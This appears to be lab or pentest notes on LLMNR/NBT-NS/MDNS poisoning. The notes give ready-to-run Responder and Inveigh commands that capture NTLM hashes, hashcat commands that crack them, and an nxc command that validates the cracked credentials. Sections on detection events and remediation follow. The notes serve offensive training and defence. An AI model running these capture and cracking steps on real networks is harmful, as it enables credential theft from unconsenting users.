LLMNR, NBT-NS, and MDNS poisoning abuses fallback name resolution.
When DNS cannot resolve a name, Windows may ask the local network. An attacker can answer and capture NTLM authentication.
It is a historically strong technique with caveats.
Nowadays, it is easily stopped by defenders and the other requirement is that the attacker needs to be on the same L2 as the victims.
Passive First
Listen without poisoning:
sudo responder -I eth0 -A
This shows whether hosts are sending LLMNR, NBT-NS, or MDNS traffic.
Useful signals:
LLMNR query for WPAD
NBT-NS query for a mistyped hostname
MDNS query from a workstation
Active Capture
Start Responder:
sudo responder -I eth0
If interface name differs:
ip addr
sudo responder -I tun0
sudo responder -I eth0
Captured hashes are written under the Responder logs directory.
Common file:
SMB-NTLMv2-SSP-*.txt
Trigger In A Lab
From a Windows host, access a hostname that DNS cannot resolve:
dir \\notrealhost\share
If fallback name resolution is enabled and Responder wins the race, the Windows host authenticates to the attacker.
Crack NetNTLMv2
Copy the captured hash into:
netntlmv2.hashes
Crack:
hashcat -m 5600 netntlmv2.hashes /usr/share/wordlists/rockyou.txt
hashcat -m 5600 netntlmv2.hashes /usr/share/wordlists/rockyou.txt --show
Validate cracked credentials:
nxc smb 10.10.10.200 -d ootw.local -u alice.wright -p 'StudentPass2026!'
Windows Inveigh
From a Windows foothold:
.\Inveigh.exe -NBNS Y -LLMNR Y -DNS Y -HTTP Y -SMB Y -Console Y -FileOutput Y
PowerShell variant:
Import-Module .\Inveigh.ps1
Invoke-Inveigh -NBNS Y -LLMNR Y -ConsoleOutput Y -FileOutput Y
Do not run Responder and Inveigh on the same segment at the same time.
Capture Versus Relay
This note covers capture and cracking.
Relay is a separate attack path. Relay requires choosing a target service and understanding signing, EPA, LDAP protections, and coercion. That belongs in the relay section.
Detection
Defenders look for:
- LLMNR or NBT-NS responses from unusual hosts
- victims connecting to unexpected SMB or HTTP listeners
- Security 4648 explicit credential use
- Security 4624 logons to unexpected systems
- Sysmon 3 network connections to attacker IPs
- Sysmon 22 DNS/fallback resolution artifacts
- Responder or Inveigh execution
Remediation
- disable LLMNR by GPO
- disable NBT-NS on interfaces
- disable WPAD where not required
- enforce SMB signing to reduce relay impact
- monitor rogue name resolution responses
- fix DNS so clients do not fall back to broadcast resolution